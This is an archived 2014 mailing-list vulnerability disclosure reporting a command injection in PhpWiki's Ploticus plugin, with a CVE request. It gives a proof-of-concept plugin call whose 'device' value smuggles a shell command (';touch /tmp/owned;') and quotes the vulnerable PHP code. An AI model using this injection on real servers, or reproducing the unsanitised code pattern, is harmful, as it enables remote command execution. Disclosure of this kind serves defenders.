lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Wed, 27 Aug 2014 23:23:45 +0100
From: "Benjamin Harris" <bch@...h.ai>
To: fulldisclosure@...lists.org, oss-security@...ts.openwall.com
Subject: [FD] PHP-Wiki Command Injection

Hi All

OSS-Security, can I get a CVE for this please?

URL: https://sourceforge.net/projects/phpwiki/

I tried to report this a month ago, but got no response from the 
developers. This is an old vulnerability I found while dusting off 
some old hard drives.

Brief:
-------------------------

PhpWiki is a WikiWikiWeb clone in PHP. A WikiWikiWeb is a site 
where anyone can edit the pages through an HTML form. Multiple 
storage backends, dynamic hyperlinking, themeable, scriptable by 
plugins, full authentication, ACL's.


Details:
--------------------------

Straight command injection in the Ploticus module. Attached is a 
working POC.

I found these notes I made:

<<Ploticus device=";touch /tmp/owned;" -prefab= -csmap= data= alt= 
help= >>
$ ls -la owned
-rw-r--r-- 1 apache apache 0 Jan 18 15:23 owned


vuln code with system execute at the bottom
controllable param is $args
           $gif = $argarray['device'];
            $args = "-$gif -o $tempfile.$gif";
                $code = $this->execute(PLOTICUS_EXE . " 
$tempfile.plo $args", $tempfile.".$gif");

['device'] is listed as an option by user when using the Politus 
plugin
"


example usage;
 <?plugin Ploticus device||=png [ploticus options...]
     multiline ploticus script ...
  ?>

:>> 

   function getImage($dbi, $argarray, $request) {
        //extract($this->getArgs($argstr, $request));
        //extract($argarray);
        $source =& $this->source;
        if (!empty($source)) {
            if ($this->withShellCommand($source)) {
                $this->_errortext .= _("shell commands not allowed 
in Ploticus");
                return false;
            }
            if (is_array($argarray['data'])) { // support <!plugin-
list !> pagelists
                $src = "#proc getdata\ndata:";
                $i = 0;
                foreach ($argarray['data'] as $data) {
                    // hash or array?
                    if (is_array($data))
                        $src .= ("\t" . join(" ", $data) . "\n");
                    else
                        $src .= ("\t" . '"' . $data . '" ' . $i++ . 
"\n");
                }
                $src .= $source;
                $source = $src;
            }
            $tempfile = $this->tempnam('Ploticus','plo');
            @unlink($tempfile);
            $gif = $argarray['device'];
            $args = "-$gif -o $tempfile.$gif";
            if (!empty($argarray['-csmap'])) {
                    $args .= " -csmap -mapfile $tempfile.map";
                    $this->_mapfile = "$tempfile.map";
            }
            if (!empty($argarray['-prefab'])) {
                    //check $_ENV['PLOTICUS_PREFABS'] and default 
directory
                global $HTTP_ENV_VARS;
                if (empty($HTTP_ENV_VARS['PLOTICUS_PREFABS'])) {
                    if (file_exists("/usr/share/ploticus"))
                        $HTTP_ENV_VARS['PLOTICUS_PREFABS'] = 
"/usr/share/ploticus";
                    elseif (defined('PLOTICUS_PREFABS'))
                        $HTTP_ENV_VARS['PLOTICUS_PREFABS'] = 
constant('PLOTICUS_PREFABS');
                }
                    $args .= (" -prefab " . $argarray['-prefab']);
            }
            if (isWindows()) {
                $fp = fopen("$tempfile.plo", "w");
                fwrite ($fp, $source);
                fclose($fp);
                $code = $this->execute(PLOTICUS_EXE . " 
$tempfile.plo $args", $tempfile.".$gif");

Many thanks,
Ben
View attachment "release.py" of type "text/x-python" (1855 bytes)


_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists